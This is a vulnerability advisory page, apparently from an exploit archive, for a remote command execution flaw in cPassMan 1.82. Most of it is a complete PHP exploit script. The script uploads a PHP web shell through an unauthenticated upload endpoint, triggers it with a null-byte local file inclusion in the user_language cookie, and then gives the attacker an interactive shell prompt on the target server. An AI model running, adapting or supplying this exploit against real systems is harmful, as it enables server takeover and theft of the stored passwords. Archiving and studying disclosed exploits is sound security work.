cPassMan 1.82 PHP Remote Command Execution

2012.02.27
Credit: ls
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

Product. Collaborative Passwords Manager (cPassMan) Platform. Independent (PHP) Affected versions. 1.82 <?php /* * cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com) * Disclaimer: cPassMan developer was notified of vulnerabilities in April 2011 and advised that v1.x was no longer supported. * Note: Requires PHP 5.3.3 or lower due to the use of a poison null byte in the LFI. */ if ($argc < 3) { print "Usage: php -f {$argv[0]} <host> <path> (e.g. php -f {$argv[0]} 192.168.129.130 /cpassman)\n"; exit(); } print "--------------------------------------------------------------------------------\n"; print "cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)\n"; print "--------------------------------------------------------------------------------\n"; $host = $argv[1]; $path = $argv[2]; $port = 80; /* * Stage One: Unauthenticated Arbitrary File Upload * Uploaded files are stored in the document root of the web server as a file with the MD5 hash of the original filename. */ print "[*] Stage One: Uploading command execution handler... "; $upload_path = $path . "/includes/libraries/uploadify/uploadify.php"; $fp = fsockopen($host, $port, $errno, $errstr, 30); if ($fp) { fputs($fp, "POST $upload_path HTTP/1.1\r\n"); fputs($fp, "Host: $host\r\n"); fputs($fp, "Content-Type: multipart/form-data; boundary=---------------------------4827543632391\r\n"); fputs($fp, "Content-Length: 233\r\n\r\n"); fputs($fp, "-----------------------------4827543632391\r\n"); fputs($fp, "Content-Disposition: form-data; name=\"Filedata\"; filename=\"rabbit.txt\";\r\n"); fputs($fp, "Content-Type: text/plain\r\n\r\n"); fputs($fp, "<?php echo system(\$_GET['z']); die(); ?>\r\n"); fputs($fp, "-----------------------------4827543632391--\r\n\r\n"); $result = fgets($fp, 16); fclose($fp); } if (strstr($result, "200 OK")) { print "Success!\n"; } /* * Stage Two: Local File Inclusion * Several LFI vulnerabilities exist in the user language selection functionality. The exploit uses the user_language cookie attack vector. */ print "[*] Stage Two: Confirming command execution via local file inclusion... "; $cmd = "echo rabbit"; $success = FALSE; $stdin = fopen("php://stdin","r"); do { $cmd = str_replace(" ", "+", $cmd); $lfi_path = $path . "/index.php?z=" . $cmd; $fp = fsockopen($host, $port, $errno, $errstr, 30); if ($fp) { fputs($fp, "GET $lfi_path HTTP/1.1\r\n"); fputs($fp, "Host: 192.168.129.130\r\n"); fputs($fp, "Cookie: user_language=../../../89f84a8775dd8f60cdbdef0d73919511%00\r\n"); fputs($fp, "Content-Length: 0\r\n\r\n"); for ($i = 0; $i < 13; $i++) { fgets($fp, 2048); } $output = "\n"; while (($tmp = fgets($fp, 2048)) != FALSE && !feof($fp)) { $output .= $tmp; } if ($success) { echo $output; } fclose($fp); } if (!$success && strstr($output, "rabbit")) { $success = TRUE; print "Success!\n"; } print "\n> "; } while ($cmd = trim(fgets($stdin))); ?>

References:

http://packetstormsecurity.org/files/110222/cpassman-exec.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top